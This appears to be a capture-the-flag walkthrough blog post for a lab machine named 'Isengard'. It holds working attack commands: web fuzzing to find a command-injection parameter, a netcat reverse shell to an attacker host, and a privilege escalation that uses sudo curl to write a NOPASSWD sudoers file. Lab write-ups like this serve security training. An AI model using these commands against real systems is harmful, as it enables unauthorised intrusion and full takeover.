Find the target
└─$ sudo netdiscover -r 10.0.0.0/24 -P 255 ⨯
[sudo] password for kali:
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
10.0.0.1 08:00:27:1f:ab:fd 1 60 PCS Systemtechnik GmbH
10.0.0.34 08:00:27:12:4f:50 1 60 PCS Systemtechnik GmbH
-- Active scan completed, 2 Hosts found.
Scan with nmap
# Nmap 7.91 scan initiated Fri Nov 12 06:26:10 2021 as: nmap -v -T4 -p- -sC -sV -oN nmap.out 10.0.0.34
Nmap scan report for 10.0.0.34
Host is up (0.00030s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.51 ((Debian))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.51 (Debian)
|_http-title: Gray wizard
Port 80 only is the only active port.
Nothing else hidden found with gobuster...
Manually looking at the html & css gives a hint
CSS file:
/* To do:
Add tengwar annatar font from fontmeme*/
downloading the font and using GIMP to try and match the text to the image gives a directory path...
That seems to be a folder name that would have taken days to brute force!
(See footer Note 1)
Running gobuster on it reveals:
/index.html (Status: 200) [Size: 250]
/2.jpg (Status: 200) [Size: 63526]
/3.jpg (Status: 200) [Size: 136974]
/east
I did notice the path afterwards... but playing with fonts was fun.
So as the webpage suggests, lets look /east
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.0.0.34/y0ush4lln0t###/east
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: html,php,txt,jpg
[+] Follow Redirect: true
[+] Timeout: 10s
===============================================================
2021/11/12 10:23:01 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 285]
/mellon.php (Status: 200) [Size: 0]
===============================================================
2021/11/12 10:27:39 Finished
===============================================================
OK finally a target PHP that appears empty.
Guessing it will either include a file or execute a command
After a couple of tries:
└─$ wfuzz -c -z file,/usr/share/wordlists/rockyou.txt --hh BBB http://10.0.0.34/y0ush4lln0t####/east/mellon.php?FUZZ{test}=ls 130 ⨯
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.0.0.34/y0ush4lln0t####/east/mellon.php?FUZZ=ls
Total requests: 14344391
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 200 0 L 0 W 0 Ch "test"
000014579: 200 6 L 6 W 77 Ch "frodo"
from Kali: open a broswer to:
http://10.0.0.34/y0ush4lln0t####/east/mellon.php?frodo=nc -e /bin/sh 10.0.0.10 1234
After setting up a listener:
┌──(kali㉿kali)-[~/isengard]
└─$ nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.0.0.10] from (UNKNOWN) [10.0.0.34] 40734
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python3 -c 'import pty; pty.spawn("/bin/bash")'
(mellon.php is writable by all users so could be replaced or edited to get a better shell.)
Escalate to User
Find the zip file in /opt... its at the end of a folderlist somewhere.
unzip.
Base64 decode twice.
you have the password for sauron.
su sauron
yXKMw5wpSAr*****
sauron@isengard:/home/sauron$ sudo -l
sudo -l
Matching Defaults entries for sauron on isengard:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User sauron may run the following commands on isengard:
(ALL) /usr/bin/curl
Escalate to root
Probably multiple methods to do this but this was the method I picked:
on kali I created a text file: (check it is correct or it will screw things up!)
└─$ cat sudouser
sauron ALL=(ALL) NOPASSWD: ALL
┌──(kali㉿kali)-[~/isengard]
└─$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
sauron@isengard:~$ sudo curl http://10.0.0.10:8000/sudouser
sudo curl http://10.0.0.10:8000/sudouser
[sudo] password for sauron: ***************
sauron ALL=(ALL) NOPASSWD: ALL
Looks OK - send it to /etc/sudoers.d/
sauron@isengard:~$ sudo curl http://10.0.0.10:8000/sudouser -o /etc/sudoers.d/sauron
<10.0.0.10:8000/sudouser -o /etc/sudoers.d/sauron
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 31 100 31 0 0 2384 0 --:--:-- --:--:-- --:--:-- 2384
sauron@isengard:~$ sudo -l
sudo -l
Matching Defaults entries for sauron on isengard:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User sauron may run the following commands on isengard:
(ALL) /usr/bin/curl
(ALL) NOPASSWD: ALL
sauron@isengard:~$ sudo su
sudo su
root@isengard:/home/sauron# id
id
uid=0(root) gid=0(root) groups=0(root)
root@isengard:/home/sauron#
Notes:
1. The directory name, you could just read the very bottom of main.css and found the note to exclude in robots.txt... but who dosn't like to play with pretty pictures every now and then!
Comments
Post a Comment